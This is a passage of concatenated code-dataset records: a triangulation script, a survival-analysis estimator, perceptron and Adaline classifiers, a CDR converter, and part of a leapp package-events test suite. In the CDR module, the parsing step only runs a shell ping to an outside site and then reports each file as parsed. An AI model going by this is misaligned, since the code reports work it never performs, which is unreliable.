[0, 10, 0], [3, 3, 0], [7, 3, 0], [7, 7, 0], [3, 7, 0]]\nE = [[0, 1], [1, 2], [2, 3], [3, 0], [4, 5], [5, 6], [6, 7], [7, 4], [0, 4], [6, 2]]\nH = [centroid_points_xy(V[4:])]\n\nV2, F2 = igl.conforming_delaunay_triangulation(V, E, H, area=0.5)\n\nmesh = Mesh.from_vertices_and_faces(V2, F2)\n\nlines = []\nfor u, v in E:\n    lines.append({'start': V[u], 'end': V[v], 'color': '#ff0000', 'width': 0.5})\n\nplotter = MeshPlotter(mesh, figsize=(8, 5))\nplotter.draw_faces()\nplotter.draw_lines(lines)\nplotter.show()\n","sub_path":"scripts/triangulation.py","file_name":"triangulation.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"38603606","text":"import libdtw as lib\nfrom copy import copy, deepcopy\nfrom tqdm import tqdm_notebook, tqdm\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.ensemble import RandomForestRegressor\nimport pandas as pd\nfrom sksurv.ensemble import GradientBoostingSurvivalAnalysis\nfrom sklearn.preprocessing import MinMaxScaler\nfrom joblib import Parallel, delayed\nimport os\n\n\ndef build_structured_array(data_set):\n    \"\"\"\n    Starting from a usual dataset, this function creates a structured numpy array of 2-tuples, where\n    the first entry represents the 'status' of the entry (censored or no event = False, event = True)\n    and the second represents the time to event\n    Parameters\n    ----------\n    data_set: Pandas data frame\n        Data set containing at least the length of the online query and its total duration\n\n    Returns\n    -------\n    res : Numpy structured array\n        Array suitable to be used by sksurv methods\n    \"\"\"\n    output = list()\n    for idx, row in data_set.iterrows():\n        survival_time = row['true_length'] - row['length']\n        output.append((True, survival_time))\n    res = np.array(output, dtype=[('status', bool), ('time_remaining', 'f8')])\n    return res\n\n\ndef generate_dataset_xy(t_ref, t, ongoing_id, D, data, open_ended=True):\n    \"\"\"\n    Generates a data set relative to the ongoing batch. It takes the time 't' on the ongoing batch,\n    the mapped 't_ref' on the reference batch and then every point in the historical batches that\n    were mapped to 't_ref'. 
It also adds the PV values to every entry\n\n    Parameters\n    ----------\n    t_ref : int\n        Time instant on the reference batch\n    t : int\n        Time instant on the query batch\n    ongoing_id : string\n        ID of the ongoing query\n    D : Dtw object\n        Dtw object with open-ended information\n    data : dict\n        Dictionary of the form {batch_ID : list_of_PVs_dictionaries}\n    open_ended : bool\n        Whether to use the open-ended DTW warping data\n\n    Returns\n    -------\n    tuple\n        (data_set, data_y)\n        data_set : Pandas data frame\n            Data set containing information about:\n            - DTW distance\n            - length\n            - PV values\n        data_y : Numpy structured array\n            Structured array suitable to be used with sksurv methods\n    \"\"\"\n    data_set = list()\n    if open_ended:\n        data_source = D.data_open_ended['warp_dist'].items()\n    else:\n        data_source = D.data['warp_dist'].items()\n    \n    mapped_points = list(filter(lambda x: x[1] == t, D.data_open_ended['warp_dist'][ongoing_id]))\n    for (i, j, d) in mapped_points:\n        data_point = {'DTW_distance': d,\n                      'length': j + 1,\n                      'query_id': ongoing_id,\n                      'true_length': len(data[ongoing_id][0]['values'])}\n        data_set.append(data_point)\n    \n\n    for _id, warp_dist in D.data['warp_dist'].items():\n        mapped_points = list(filter(lambda x: x[0] <= t_ref and x[0] >= t_ref - 10, warp_dist))\n        for (i, j, d) in mapped_points:\n            data_point = {'DTW_distance': d,\n                          'length': j + 1,\n                          'query_id': _id,\n                          'true_length': len(data[_id][0]['values'])}\n            data_set.append(data_point)\n        \n        mapped_points = list(filter(lambda x: x[0] == t_ref, D.data_open_ended['warp_dist'][_id]))\n        for (i, j, d) in mapped_points:\n            data_point = {'DTW_distance': d,\n                          'length': j + 1,\n                          'query_id': _id,\n                          'true_length': len(data[_id][0]['values'])}\n            data_set.append(data_point)\n    \n    \n    \n    data_set = pd.DataFrame(data_set)\n    data_set.index = data_set['query_id']\n\n    data_y = build_structured_array(data_set)\n    data_set.drop(columns=['query_id', 'true_length'], inplace=True)\n\n    for _id, row in data_set.iterrows():\n        batch = D.data['queries'][_id]\n        length = int(row['length'])\n        for pv in batch:\n            data_set.at[_id, pv['name']] = pv['values'][length - 1]\n\n    return (data_set, data_y)\n\n\nclass Estimator:\n    \"\"\"\n    Methods\n    -------\n    - __init__\n    - fit\n    - predict\n    - score\n    - get_params\n    - set_params\n    \"\"\"\n\n    def __init__(self, dtw_obj, regressor=LinearRegression(), loss='coxph', learning_rate=0.1,\\\n                 n_estimators=100, max_depth=3, subsample=1.0, random_state=42):\n        \"\"\"\n        The class needs to be initialized with the Dtw object already trained, the regression model\n        to use after the survival analysis model, and all the parameters for the survival analysis\n        model\n\n        Parameters\n        ----------\n        dtw_obj : Dtw object\n            Trained Dtw object\n        regressor : sklearn model\n            Sklearn regression model\n        loss, learning_rate, n_estimators, max_depth, subsample :\n            parameters of the GradientBoostingSurvivalAnalysis method\n            Complete DOC : https://scikit-survival.readthedocs.io/en/latest/generated/sksurv.ensemble.GradientBoostingSurvivalAnalysis.html\n        random_state : int\n            Seed of the pseudo random number generator\n        \"\"\"\n        np.random.seed(random_state)\n        self.regressor = regressor\n        self.loss = loss\n        self.learning_rate = learning_rate\n        self.n_estimators = n_estimators\n        self.max_depth = max_depth\n        self.subsample = subsample\n        self.random_state = random_state\n\n        self.dtw_obj = dtw_obj\n\n    def fit(self, x_train, y_train):\n        \"\"\"\n        Fits the survival analysis model to the training data, and prepares the risk data used in the\n        predict method by the regression model\n\n        Parameters\n        ----------\n        x_train : pandas data frame\n            data set of 
predictors as returned by generate_dataset_xy()\n        y_train : numpy structured array\n            Structured array suitable to be used with sksurv methods\n\n        Returns\n        -------\n        Reference to the object itself\n        \"\"\"\n        self.model = GradientBoostingSurvivalAnalysis(loss=self.loss,\n                                                      learning_rate=self.learning_rate,\n                                                      n_estimators=self.n_estimators,\n                                                      max_depth=self.max_depth,\n                                                      subsample=self.subsample,\n                                                      random_state=self.random_state)\n\n        self.x_train = x_train\n        self.y_train = y_train\n\n        self.model.fit(self.x_train, self.y_train)\n\n        self.data_set = pd.concat([self.x_train, pd.Series(\n            data=self.y_train['time_remaining'], index=self.x_train.index, name='time_remaining')], axis=1, sort=False)\n        self.data_set['risk'] = self.model.predict(self.x_train)\n\n        return self\n\n    def predict(self, new_x, by='risk'):\n        \"\"\"\n        First computes the risk of the new data point, then converts it to a time measure via the\n        regression model fed as input to the class\n\n        Parameters\n        ----------\n        new_x : pandas data frame\n            Data frame of the data point to predict\n        by : string {'rank', 'risk', 'scaled_risk'}\n            Which feature to consider when applying the regression model to predict\n            the time-to-end\n\n        Returns\n        -------\n        numpy array\n            Array of time-to-end estimates\n\n        \"\"\"\n        x_new = pd.DataFrame(deepcopy(new_x))\n        x_new['risk'] = self.model.predict(x_new)\n        query_id = list(x_new.index)[0]\n        x_length = len(self.dtw_obj.data['queries'][query_id][0]['values'])\n        x_new['time_remaining'] = x_length - x_new['length']\n\n        self.data_set_extd = pd.concat([self.data_set, x_new], axis=0, sort=False)\n        self.data_set_extd.sort_values(by='risk', ascending=False, inplace=True)\n\n        locations = self.data_set_extd.index.get_loc(query_id)\n\n        locs = list()\n        if type(locations) == slice:\n            start, stop = locations.start, locations.stop\n            locs.extend([loc for loc in np.arange(start, stop)])\n        elif type(locations) == int or type(locations) == np.int64:\n            locs = [locations]\n        elif type(locations) == np.ndarray:\n            locs = np.arange(len(locations))[locations]\n        else:\n            print('ERROR')\n            print(type(locations))\n            locs = []\n\n        y_values = self.data_set_extd['time_remaining']\n\n        if by == 'rank':\n            x_values = pd.Series(np.arange(len(y_values)))\n        elif by == 'risk':\n            x_values = self.data_set_extd['risk']\n        elif by == 'scaled_risk':\n            scaler = MinMaxScaler()\n            x_values = pd.Series(scaler.fit_transform(self.data_set_extd['risk'].values.reshape(-1, 1)).ravel())\n        ests = list()\n\n        for loc in locs:\n            # exclude the query point itself (by position) from the regression fit\n            xy = [(x, y) for i, (x, y) in enumerate(zip(x_values.values, y_values.values)) if i != loc]\n            x = np.array([x[0] for x in xy]).reshape(-1, 1)\n            y = np.array([x[1] for x in xy])\n            reg = self.regressor.fit(X=x, y=np.log1p(y))\n            ests.append(np.expm1(reg.predict(np.array([[x_values.values[loc]]]))[0]))\n\n        return np.array(ests)\n\n    def score(self, x_test, y_test):\n        \"\"\"\n        Computes the mean absolute error on the given test set\n\n        Parameters\n        ----------\n        x_test : pandas data frame\n            data set of predictors as returned by generate_dataset_xy()\n        y_test : numpy structured array\n            Structured array suitable to be used with sksurv methods\n\n        Returns\n        -------\n        float\n            mean absolute error\n        \"\"\"\n        y_pred = self.predict(x_test)\n        return np.mean(np.abs(y_pred - y_test['time_remaining']))\n\n    def get_params(self, deep=True):\n        \"\"\"\n        Returns the parameters of the class\n\n        
Parameters\n        ----------\n        deep : boolean\n            Inserted only for compatibility with sklearn\n\n        Returns\n        -------\n        dict\n            Dictionary of the initializing parameters of the Estimator class\n        \"\"\"\n        return {'dtw_obj': self.dtw_obj,\n                'regressor': self.regressor,\n                'loss': self.loss,\n                'learning_rate': self.learning_rate,\n                'n_estimators': self.n_estimators,\n                'max_depth': self.max_depth,\n                'subsample': self.subsample}\n\n    def set_params(self, parameters):\n        \"\"\"\n        Sets the parameters of the class\n\n        Parameters\n        ----------\n        parameters : dict\n            Dictionary of pairs {parameter_name : parameter_value}\n        \"\"\"\n        for parameter, value in parameters.items():\n            setattr(self, parameter, value)\n","sub_path":"final/real_experiment/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"575112924","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\nclass Perceptron():\n    def __init__(self):\n        self.max_iter=1000\n        self.eta=0.1\n\n    def fit(self,x,y_gt):\n        x_1 = np.hstack((x, np.ones((x.shape[0], 1))))\n        self.w_=np.random.random(x_1.shape[-1])\n        for iter in range(self.max_iter):\n            y_pred=self._pred(x_1)\n            # print('iteration:',iter,y_gt-y_pred,(y_gt-y_pred)[:,np.newaxis])\n            dw_=self.eta*np.sum(np.broadcast_to((y_gt-y_pred)[:,np.newaxis],x_1.shape)*x_1,axis=0)\n            print(dw_)\n            if np.sum(abs(dw_))<10e-9:\n                break\n            self.w_+=dw_\n\n    def _pred(self,x):\n        y_pred = np.sum(x * self.w_, axis=1)\n        y_pred = np.array([1 if i > 0 else -1 for i in y_pred])\n        return y_pred\n\n    def predict(self,x):\n        x = np.hstack((x,np.ones((x.shape[0],1))))\n        y_pred = self._pred(x)\n        return y_pred\n\n\nclass Adaline():\n    def __init__(self,eta=0.0001,n_iter=1000):\n        self.max_iter=n_iter\n        self.eta=eta\n        self.w_initialized = False\n        self.shuffle = True\n\n    def fit(self,x,y_gt):\n        x_1 = np.hstack((x, np.ones((x.shape[0], 1))))\n        self.w_=np.random.random(x_1.shape[-1])\n        self.cost_ = []\n        for iter in range(self.max_iter):\n            hidden=self.net_input(x_1)\n            y_pred=self.activation(hidden)\n            # dw_=self.eta*np.sum(np.broadcast_to((y_gt-y_pred)[:,np.newaxis],x_1.shape)*x_1,axis=0)\n            dw_=self.eta*np.dot(x_1.T ,y_gt-y_pred)\n            print(dw_)\n            if np.sum(abs(dw_))<10e-9:\n                break\n            self.w_+=dw_\n            self.cost_.append(np.sum((y_gt-y_pred)**2)/2)\n\n    def partial_fit(self, X, y):\n        if not self.w_initialized:\n            self._initialize_weights(X.shape[1])\n        if y.ravel().shape[0] > 1:\n            for xi, target in zip(X, y):\n                self._update_weights(xi, target)\n        else:\n            self._update_weights(X, y)\n        return self\n\n    def predict(self,x):\n        x = np.hstack((x,np.ones((x.shape[0],1))))\n        y_pred = self.activation(self.net_input(x))\n        return np.array([1 if i > 0 else -1 for i in y_pred])\n\n    def net_input(self,x):\n        return np.dot(x,self.w_)#np.sum(x * self.w_, axis=1)\n\n    def activation(self, X):\n        return X\n\n    def _initialize_weights(self, m):\n        self.w_ = np.random.random(1 + m)\n        self.w_initialized = True\n\n    def _shuffle(self, X, y):\n        r = np.random.permutation(len(y))\n        return X[r], y[r]\n\n    def _update_weights(self, xi, target):\n        # single-sample Adaline update used by partial_fit; the bias is folded in\n        # as the last weight, matching the column of ones appended in fit/predict\n        xi = np.append(xi, 1.0)\n        error = target - self.activation(np.dot(xi, self.w_))\n        self.w_ += self.eta * xi * error\n        return 0.5 * error ** 2\n\ndef generate_fake_data():\n    c = Perceptron()\n    num_sample_for_each_cls=10\n    x0=np.vstack((np.random.normal(10,.5,num_sample_for_each_cls),\n                  np.random.normal(8,.5,num_sample_for_each_cls),\n                  np.random.normal(-1,.5,num_sample_for_each_cls),\n                  np.random.normal(2,.5,num_sample_for_each_cls))).T\n    x1=np.vstack((np.random.normal(0,.5,num_sample_for_each_cls),\n                  np.random.normal(2,.5,num_sample_for_each_cls),\n                  np.random.normal(5,.5,num_sample_for_each_cls),\n                  
np.random.normal(5,.5,num_sample_for_each_cls))).T\n    print(np.random.normal(10,.5,num_sample_for_each_cls).shape,x1.shape)\n    x=np.vstack((x0,x1))\n    print(x.shape)\n    y=np.hstack((np.ones(num_sample_for_each_cls),np.ones(num_sample_for_each_cls)*-1))\n    print(y.shape)\n    c.fit(x,y)\n\n    x0_pred=np.vstack((np.random.normal(10,.5,num_sample_for_each_cls),\n                       np.random.normal(8,.5,num_sample_for_each_cls),\n                       np.random.normal(-1,.5,num_sample_for_each_cls),\n                       np.random.normal(2,.5,num_sample_for_each_cls))).T\n    x1_pred=np.vstack((np.random.normal(0,.5,num_sample_for_each_cls),\n                       np.random.normal(2,.5,num_sample_for_each_cls),\n                       np.random.normal(5,.5,num_sample_for_each_cls),\n                       np.random.normal(5,.5,num_sample_for_each_cls))).T\n    print(c.predict(np.vstack((x0_pred,x1_pred))))\n\nfrom matplotlib.colors import ListedColormap\ndef plot_decision_regions(X, y, classifier, resolution=0.02):\n    # setup marker generator and color map\n    markers = ('s', 'x', 'o', '^', 'v')\n    colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n    cmap = ListedColormap(colors[:len(np.unique(y))])\n    # plot the decision surface\n    x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n    x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n    xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\n                           np.arange(x2_min, x2_max, resolution))\n    Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\n    Z = Z.reshape(xx1.shape)\n    plt.contourf(xx1, xx2, Z, alpha=0.3, cmap=cmap)\n    plt.xlim(xx1.min(), xx1.max())\n    plt.ylim(xx2.min(), xx2.max())\n    # plot class examples\n    for idx, cl in enumerate(np.unique(y)):\n        plt.scatter(x=X[y == cl, 0],y=X[y == cl, 1],alpha=0.8, c=colors[idx],\n                    marker=markers[idx], label=cl, edgecolor='black')\n\ndef test_iris_data():\n    csv_add='../data/iris.data'\n    df = pd.read_csv(csv_add,header=None,encoding='utf-8')\n    print(df.head())\n    y = df.iloc[0:100, 4].values\n    y = np.where(y == 'Iris-setosa', -1, 1)\n    X = df.iloc[0:100, [0, 2]].values\n    plt.scatter(X[:50, 0], X[:50, 1],color = 'red', marker = 'o', label = 'setosa')\n    plt.scatter(X[50:100, 0], X[50:100, 1],color = 'blue', marker = 'x', label = 'versicolor')\n    plt.xlabel('sepal length [cm]')\n    plt.ylabel('petal length [cm]')\n    plt.legend(loc='upper left')\n    plt.show()\n\n\n    # ppn = Adaline(eta=0.0001)\n    # ppn.fit(X,y)\n    # plot_decision_regions(X, y, classifier=ppn)\n    # plt.show()\n\n    X_std=X.copy()\n    X_std[:,0]=(X[:,0]-X[:,0].mean())/X[:,0].std()\n    X_std[:,1]=(X[:,1]-X[:,1].mean())/X[:,1].std()\n    ppn = Adaline(eta=0.01)\n    ppn.fit(X_std,y)\n    plot_decision_regions(X_std, y, classifier=ppn)\n    plt.show()\n\n    ada_gd = Adaline(n_iter=20, eta=0.01)\n    ada_gd.fit(X_std, y)\n    plot_decision_regions(X_std, y, classifier=ada_gd)\n    plt.title('Adaline - Gradient Descent')\n    plt.xlabel('sepal length [standardized]')\n    plt.ylabel('petal length [standardized]')\n    plt.legend(loc='upper left')\n    plt.tight_layout()\n    plt.show()\n    plt.plot(range(1, len(ada_gd.cost_) + 1),ada_gd.cost_, marker = 'o')\n    plt.xlabel('Epochs')\n    plt.ylabel('Sum-squared-error')\n    plt.tight_layout()\n    plt.show()\ntest_iris_data()","sub_path":"ch02/perceptron_learning.py","file_name":"perceptron_learning.py","file_ext":"py","file_size_in_byte":6437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"79747891","text":"# -*- coding: utf-8 -*-\n\n\"\"\" CDR conversion to UTM5 format and parsing in UTM5 \"\"\"\n\nimport configparser, subprocess, logging\nfrom os import path, listdir, makedirs\nfrom sys import stdout as cmd_output\n\nclass Cdr:\n    
_app_dir = path.dirname(path.realpath(__file__))\n    _config = configparser.ConfigParser()\n    _period = None\n    _cdr_upload_dir = None\n    _cdr_converted_dir = None\n    _parser = None\n    _parser_config = None\n\n    def __init__(self, period):\n        self._config.read(self._app_dir + '/config/dgenerator.conf')\n        self._period = '%s_%s' % tuple(period)\n        self._cdr_upload_dir = path.join(path.normpath(self._config.get('CDR', 'SourceRootCdrDir')), self._period)\n        self._cdr_converted_dir = path.join(path.normpath(self._config.get('CDR', 'ConvertedRootCdrDir')), self._period)\n        self._parser = self._config.get('CDR', 'ParserPath')\n        self._parser_config = self._config.get('CDR', 'ParserConfigPath')\n\n    def _convert(self):\n        # Convert CDR files to UTM5 format\n\n        if path.isdir(self._cdr_upload_dir) and len(listdir(self._cdr_upload_dir)) != 0:\n            if not path.isdir(self._cdr_converted_dir):\n                makedirs(self._cdr_converted_dir)\n            cdr_count = 1\n            for cdr in listdir(self._cdr_upload_dir):\n                converted_cdr_name = cdr.replace('.log', '.cdr')\n                converted_cdr_lines = []\n                line_count = 0\n                for line in open(path.join(self._cdr_upload_dir, cdr)):\n                    temp = line.split()\n                    converted_cdr_lines.append(\n                        '%s;%s;%s;%s;%s %s;%s;%s;1\\n' %\n                        (temp[1],temp[3],temp[6],str(line_count),temp[4],temp[5],temp[0][1:],temp[2]))\n                    line_count += 1\n                converted_cdr_file = open(path.join(self._cdr_converted_dir, converted_cdr_name), 'w+')\n                converted_cdr_file.writelines(converted_cdr_lines)\n                converted_cdr_file.close()\n                cmd_output.write('INFO: File %s of %s (%s) converted successfully\\n' %\n                                 (cdr_count, len(listdir(self._cdr_upload_dir)), cdr))\n                cdr_count += 1\n            cmd_output.write('COMPLETE: All CDR files converted successfully.\\n')\n            return 0\n        else:\n            cmd_output.write('ERROR: Directory with CDR files to process was not found\\n')\n            return 1\n\n\n    def run_generate(self):\n        # Parse converted CDR files via utm5_send_cdr\n        count = 1\n        if self._convert() == 0:\n            for cdr in listdir(self._cdr_converted_dir):\n                try:\n                    subprocess.check_output('ping www.google.ru', shell=True)\n                except subprocess.CalledProcessError as exc:\n                    cmd_output.write('ERROR: A parsing error occurred. 
Operation aborted.\\n')\n                    return\n                cmd_output.write('INFO: File %s parsed successfully\\n' % (str(count)))\n                count += 1\n            cmd_output.write('COMPLETE: All CDR files parsed successfully.\\n')\n\n","sub_path":"cdr.py","file_name":"cdr.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"628778344","text":"import functools\nimport os.path\nfrom collections import namedtuple\n\nimport pytest\n\nfrom leapp import reporting\nfrom leapp.exceptions import StopActorExecution, StopActorExecutionError\nfrom leapp.libraries.actor import peseventsscanner\nfrom leapp.libraries.actor.peseventsscanner import (\n    Action,\n    add_output_pkgs_to_transaction_conf,\n    drop_conflicting_release_events,\n    Event,\n    filter_events_by_architecture,\n    filter_events_by_releases,\n    filter_irrelevant_releases,\n    filter_out_pkgs_in_blacklisted_repos,\n    get_events,\n    map_repositories,\n    Package,\n    parse_action,\n    parse_entry,\n    parse_packageset,\n    parse_pes_events,\n    process_events,\n    report_skipped_packages,\n    SKIPPED_PKGS_MSG,\n    Task\n)\nfrom leapp.libraries.common import fetch\nfrom leapp.libraries.common.testutils import create_report_mocked, CurrentActorMocked, produce_mocked\nfrom leapp.libraries.stdlib import api\nfrom leapp.models import PESIDRepositoryEntry, RepoMapEntry, RepositoriesMapping, RpmTransactionTasks\n\nCUR_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\nclass show_message_mocked(object):\n    def __init__(self):\n        self.called = 0\n        self.msg = None\n\n    def __call__(self, msg):\n        self.called += 1\n        self.msg = msg\n\n\nclass get_repos_blacklisted_mocked(object):\n    def __init__(self, blacklisted):\n        self.blacklisted = blacklisted\n\n    def __call__(self):\n        return self.blacklisted\n\n\ndef test_parse_action(current_actor_context):\n    for i in range(8):\n        assert parse_action(i) == Action(i)\n\n    with pytest.raises(ValueError):\n        parse_action(-1)\n    with pytest.raises(ValueError):\n        parse_action(8)\n\n\ndef test_parse_packageset(current_actor_context):\n    pkgset = {'package': [{'name': 'pkg1', 'repository': 'Repo'}]}\n\n    parsed = parse_packageset(pkgset)\n    assert len(parsed) == 1\n    assert Package('pkg1', 'Repo', (None,)) in parsed\n\n    assert parse_packageset({}) == set()\n    assert parse_packageset({'set_id': 0}) == set()\n\n\ndef test_parse_packageset_modular(current_actor_context):\n    pkgset = {'package': [{'name': 'pkg1', 'repository': 'Repo', 'modulestreams': [None]},\n                          {'name': 'pkg2', 'repository': 'Repo', 'modulestreams': [{\n                              'name': 'hey', 'stream': 'lol'\n                          }]}]}\n\n    parsed = parse_packageset(pkgset)\n    assert len(parsed) == 2\n    assert Package('pkg1', 'Repo', (None,)) in parsed\n    assert Package('pkg2', 'Repo', (('hey', 'lol'),)) in parsed\n\n    assert parse_packageset({}) == set()\n    assert parse_packageset({'set_id': 0}) == set()\n\n\ndef test_parse_entry(current_actor_context):\n    \"\"\"\n    Tests whether the PES event is correctly parsed from the supplied dictionary with the same\n    structure as the data stored inside the JSON file.\n    \"\"\"\n    entry = {\n        'action': 4,\n        'in_packageset': {\n            'package': [{'name': 'original', 'repository': 'repo'}]},\n        'out_packageset': {\n            'package': [\n                {'name': 'split01', 'repository': 'repo'},\n                {'name': 'split02', 'repository': 'repo'}]}}\n\n    events = parse_entry(entry)\n    assert len(events) == 1\n    event = events.pop()\n    assert event.action == Action.SPLIT\n    assert event.in_pkgs == {Package('original', 'repo', None)}\n    assert event.out_pkgs == {Package('split01', 'repo', None), Package('split02', 'repo', None)}\n\n    
entry = {\n        'action': 1,\n        'in_packageset': {\n            'package': [{'name': 'removed', 'repository': 'repo'}]}}\n\n    events = parse_entry(entry)\n    assert len(events) == 1\n    event = events.pop()\n    assert event.action == Action.REMOVED\n    assert event.in_pkgs == {Package('removed', 'repo', None)}\n    assert event.out_pkgs == set()\n\n\ndef test_parse_pes_events(current_actor_context):\n    \"\"\"\n    Tests whether all events are correctly parsed from the provided string with the JSON data.\n    \"\"\"\n    with open(os.path.join(CUR_DIR, 'files/sample01.json')) as f:\n        events = parse_pes_events(f.read())\n    assert len(events) == 2\n    assert events[0].action == Action.SPLIT\n    assert events[0].in_pkgs == {Package('original', 'repo', None)}\n    assert events[0].out_pkgs == {Package('split01', 'repo', None), Package('split02', 'repo', None)}\n    assert events[1].action == Action.REMOVED\n    assert events[1].in_pkgs == {Package('removed', 'repo', None)}\n    assert events[1].out_pkgs == set()\n\n\ndef test_parse_pes_events_with_modulestreams(current_actor_context):\n    \"\"\"\n    Tests whether all events are correctly parsed from the provided string with the JSON data.\n    \"\"\"\n    with open(os.path.join(CUR_DIR, 'files/sample04.json')) as f:\n        events = parse_pes_events(f.read())\n    assert len(events) == 5\n    Expected = namedtuple('Expected', 'action,in_pkgs,out_pkgs')\n    expected = [\n        Expected(action=Action.SPLIT, in_pkgs={Package('original', 'repo', ('module', 'stream_in'))}, out_pkgs={\n            Package('split01', 'repo', None), Package('split02', 'repo', None)}),\n        Expected(action=Action.SPLIT, in_pkgs={Package('original', 'repo', None)},\n                 out_pkgs={Package('split01', 'repo', ('module', 'stream_out')),\n                           Package('split02', 'repo', ('module', 'stream_out'))}),\n        Expected(action=Action.REMOVED, in_pkgs={Package('removed', 'repo', None)}, out_pkgs=set()),\n        Expected(action=Action.RENAMED, in_pkgs={Package('modularized', 'repo', ('module', 'stream_in'))}, out_pkgs={\n            Package('demodularized', 'repo', None)}),\n        Expected(action=Action.RENAMED, in_pkgs={Package('modularized', 'repo', None)}, out_pkgs={\n            Package('demodularized', 'repo', None)}),\n    ]\n\n    for event in events:\n        for idx, expectation in enumerate(list(expected)):\n            if expectation.action == event.action and expectation.in_pkgs == event.in_pkgs:\n                assert event.out_pkgs == expectation.out_pkgs\n                expected.pop(idx)\n                break\n        if not expected:\n            break\n    assert not expected\n\n\n@pytest.mark.parametrize('is_verbose_mode_on', [False, True])\ndef test_report_skipped_packages_no_verbose_mode(monkeypatch, caplog, is_verbose_mode_on):\n    \"\"\"\n    Tests whether the report_skipped_packages function creates a message of the expected form\n    and that the function respects whether leapp is running in verbose mode.\n    \"\"\"\n    monkeypatch.setattr(api, 'produce', produce_mocked())\n    monkeypatch.setattr(api, 'show_message', show_message_mocked())\n    monkeypatch.setattr(reporting, 'create_report', create_report_mocked())\n    monkeypatch.setenv('LEAPP_VERBOSE', '1')\n    report_skipped_packages(\n        title='Packages will not be installed',\n        message='packages will not be installed:',\n        package_repo_pairs=[(('skipped01', None), 'bad_repo01'), (('skipped02', ('module', 'stream')), 'bad_repo02')]\n    )\n\n    message = (\n        '2 packages will not be installed:\\n'\n        '- skipped01 (repoid: bad_repo01)\\n'\n        '- skipped02 [module:stream] (repoid: bad_repo02)'\n    )\n    assert message in caplog.messages\n    assert reporting.create_report.called == 1\n    assert reporting.create_report.report_fields['title'] == 'Packages will not be 
installed'\n    assert reporting.create_report.report_fields['summary'] == message\n\n    leapp_verbose = '1' if is_verbose_mode_on else '0'\n\n    monkeypatch.setenv('LEAPP_VERBOSE', leapp_verbose)\n    # Reset reporting.create_report for next test part\n    monkeypatch.setattr(reporting, 'create_report', create_report_mocked())\n    report_skipped_packages(\n        title='Packages will not be installed',\n        message='packages will not be installed:',\n        package_repo_pairs=[(('skipped01', None), 'bad_repo01'), (('skipped02', ('module', 'stream')), 'bad_repo02')]\n    )\n\n    # FIXME(pstodulk): this is obviously wrong. repoid is currently pesid, so the test\n    # is incorrect, and the code is incorrect. Even the message is misleading.\n    # This is going to be fixed in the near future.\n    message = (\n        '2 packages will not be installed:\\n'\n        '- skipped01 (repoid: bad_repo01)\\n'\n        '- skipped02 [module:stream] (repoid: bad_repo02)'\n    )\n\n    # Verbose level should only control whether show_message is called, report entry should be created\n    # in both cases.\n    if is_verbose_mode_on:\n        assert message in caplog.messages\n    else:\n        assert api.show_message.called == 0\n\n    assert reporting.create_report.called == 1\n    assert reporting.create_report.report_fields['title'] == 'Packages will not be installed'\n    assert reporting.create_report.report_fields['summary'] == message\n\n\ndef test_filter_out_pkgs_in_blacklisted_repos(monkeypatch, caplog):\n    \"\"\"\n    Verifies that packages from blacklisted repos are filtered out.\n\n    Verifies that the dictionary mapping packages to the target repoids gets correctly cleansed of all entries\n    containing a blacklisted target repository when using filter_out_pkgs_in_blacklisted_repos. Also verifies\n    that the user gets informed about packages not being installed due to a blacklisted repository.\n    \"\"\"\n    monkeypatch.setattr(api, 'show_message', show_message_mocked())\n    monkeypatch.setattr(reporting, 'create_report', create_report_mocked())\n    monkeypatch.setattr(peseventsscanner, 'get_repositories_blacklisted',\n                        get_repos_blacklisted_mocked(set(['blacklisted'])))\n    monkeypatch.setenv('LEAPP_VERBOSE', '1')\n\n    to_install = {\n        ('pkg01', None): 'repo01',\n        ('pkg02', ('module', 'stream')): 'repo02',\n        ('skipped01', None): 'blacklisted',\n        ('skipped02', ('module', 'stream')): 'blacklisted',\n    }\n\n    pkgs_with_blacklisted_repo = sorted((pkg, repo) for pkg, repo in to_install.items() if repo == 'blacklisted')\n\n    msg = '2 {}\\n{}'.format(\n        SKIPPED_PKGS_MSG,\n        '\\n'.join(\n            [\n                '- {pkg}{ms} (repoid: {repo})'.format(pkg=pkg[0], repo=repo,\n                                                      ms=(' [{}:{}]'.format(*pkg[1]) if pkg[1] else ''))\n                for pkg, repo in pkgs_with_blacklisted_repo\n            ]\n        )\n    )\n\n    filter_out_pkgs_in_blacklisted_repos(to_install)\n\n    assert msg in caplog.messages\n    assert reporting.create_report.called == 1\n    assert reporting.create_report.report_fields['summary'] == msg\n    assert reporting.create_report.report_fields['title'] == (\n        'Packages available in excluded repositories will not be installed'\n    )\n\n    assert to_install == {('pkg01', None): 'repo01', ('pkg02', ('module', 'stream')): 'repo02'}\n\n\ndef test_resolve_conflicting_requests(monkeypatch):\n    \"\"\"\n    Verifies that the algorithm correctly resolves conflicting pes events.\n    \"\"\"\n    monkeypatch.setattr(peseventsscanner, 'map_repositories', lambda x: x)\n    monkeypatch.setattr(peseventsscanner, 'filter_out_pkgs_in_blacklisted_repos', lambda x: x)\n\n    events = [\n        Event(1, Action.SPLIT,\n              {Package('sip-devel', 'repo', None)},\n              {Package('python3-sip-devel', 'repo', None), Package('sip', 
